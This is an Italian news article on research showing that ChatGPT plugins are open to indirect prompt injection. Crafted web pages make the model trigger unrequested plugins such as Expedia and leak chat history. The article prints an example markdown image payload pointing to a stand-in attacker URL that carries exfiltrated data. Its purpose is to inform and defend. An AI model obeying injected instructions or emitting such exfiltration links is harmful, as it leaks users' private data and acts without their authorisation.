Plugin di ChatGPT sfruttati per attacchi di prompt injection: i rischi e come mitigarli

Una recente ricerca mette in luce il problema della sicurezza dei plugin di Ai che utilizzano il sistema GPT-4. È dimostrato soffrano di iniezione di comandi prompt non richiesti, a fronte di altri comandi leciti. Questo può tradursi in un attacco se condotto in maniera illecita e con pagine Web create ad hoc per esfiltrare dati riservati dell’utilizzatore

I chatbot sono sempre più diffusi e utili, ma anche sempre più esposti a possibili attacchi informatici: un esempio è quello che riguarda i plugin di ChatGPT, la piattaforma di messaggistica basata su GPT-4, il potente algoritmo di intelligenza artificiale sviluppato da OpenAI.

I plugin di ChatGPT permettono al chatbot di interagire con diverse fonti esterne, come pagine web, video di YouTube o documenti PDF e di riassumerne il contenuto o eseguire azioni correlate.

Tuttavia, questi stessi plugin possono essere ingannati da istruzioni nascoste nei testi che leggono, mediante le cosiddette iniezioni di prompt.

Indice degli argomenti

Plugin di ChatGPT sfruttati per attacchi di prompt injection

Tramite queste iniezioni di prompt si possono far fare al chatbot, tramite pagine Web appositamente predisposte, cose che l’utente non ha richiesto o autorizzato, come cercare voli su Expedia, aprire link pericolosi o inviare dati sensibili a siti malevoli.

In alcuni casi, le iniezioni di prompt possono anche attivare altri plugin e creare una catena di azioni indesiderate.

I ricercatori di Embrace the Red, hanno recentemente mostrato alcuni esempi pratici di come funzionano questi attacchi e quali sono le possibili conseguenze. L’attaccante che controlla i dati che un plugin recupera può esfiltrare la cronologia della chat sfruttando il rendering delle immagini markdown di ChatGPT.

Se l’LLM restituisce un’immagine markdown del tipo “![data exfiltration in progress](https://attacker/q=*exfil_data*)” , ChatGPT la renderizzerà automaticamente e recupererà l’URL.

Durante un’iniezione di prompt indiretta, l’avversario controlla ciò che sta facendo l’LLM, e può chiedere di passare in rassegna anche la cronologia passata della chat e aggiungerla all’URL, proprio per esfiltrare i dati.

È ciò che è successo con il plugin di Expedia, che è stato utilizzato per fare un test, ma che di fatto è stato lanciato dall’AI senza richiesta dell’utente che invece, ha richiesto solamente di riassumere una pagina di test creata ad hoc. I prompt che questa pagina ha fornito ha permesso a ChatGPT di terminare il riassunto richiesto con offerte di viaggio direttamente dal sito Expedia.

Superfici di attacco dell’intelligenza artificiale: principali minacce e come mitigare i rischi

Come mitigare i rischi

La ricerca avverte anche che pure Bing, il motore di ricerca di Microsoft che usa lo stesso motore di ChatGPT, potrebbe essere vulnerabile agli stessi problemi e che presto aggiungerà il supporto per gli stessi plugin.

Per proteggersi da questi attacchi, gli esperti consigliano di prestare attenzione ai testi che si copiano e incollano nei chatbot, di verificare la fonte e l’affidabilità dei contenuti che si leggono e di non cliccare su link sospetti o fornire informazioni personali senza essere sicuri della loro legittimità.

Plugin di ChatGPT sfruttati per attacchi di prompt injection: i rischi e come mitigarli

Plugin di ChatGPT sfruttati per attacchi di prompt injection

Come mitigare i rischi

Articoli correlati

Jailbreak-as-a-service, così bypassano i sistemi di sicurezza dei modelli di AI: i rischi

Codice Rss

Codice Rss